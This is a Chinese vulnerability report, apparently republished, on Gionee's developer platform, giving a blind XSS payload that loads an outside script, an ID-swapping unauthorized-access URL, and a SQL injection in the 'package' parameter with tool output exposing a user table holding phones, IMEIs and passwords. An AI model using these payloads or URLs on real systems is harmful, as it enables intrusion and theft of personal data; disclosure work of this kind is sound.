金立手机某处未授权访问&注入&xss盲打(150W+用户信息) 金立手机某处未授权访问&注入&xss盲打(150W+用户信息)
金立手机某处未授权访问&注入&xss盲打(150W+用户信息)
金立手机某处未授权访问&注入&xss盲打(150W+用户信息)
金立开发者平台
https://dev.anzhuoapk.com/
1、xss盲打
payload
'"><script src=https://t.cn/></script>
2、未授权访问
https://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5961&package=com.bccv.meitu&act=business
更换id接口访问他人提交的app
3、注射
https://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5967&package=com.bccv.meitu&act=business
参数package
current user is DBA: True
Database: aorausermanagerdb Table: aouserlist [22 columns] +---------------+--------------------------+ | Column | Type | +---------------+--------------------------+ | CityId | int(11) | | CityName | varchar(100) | | CpId | int(11) | | CreateTime | datetime | | grade | int(1) unsigned zerofill | | HashKey | varchar(50) | | Id | int(11) | | Imei | varchar(50) | | Imsi | varchar(50) | | LastLoginTime | datetime | | LoginName | varchar(50) | | LoginNum | int(1) | | LogMsg | varchar(2000) | | LostLoginImei | varchar(50) | | Model | varchar(200) | | Phone | varchar(50) | | ProvinceName | varchar(50) | | RegSource | varchar(50) | | Remark | varchar(200) | | State | int(11) | | UserName | varchar(50) | | UserPsw | varchar(100) | +---------------+--------------------------+
dump一部分
配置文件读不了。找不到网站路径。。
https://www.dengb.com/qyaq/1104471.htmlwww.dengb.comtruehttps://www.dengb.com/qyaq/1104471.htmlTechArticle金立手机某处未授权访问注入xss盲打(150W+用户信息) 金立手机某处未授权访问注入xss盲打(150W+用户信息) 金立开发者平台 https://dev.anzhuoapk.c…
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/99718.html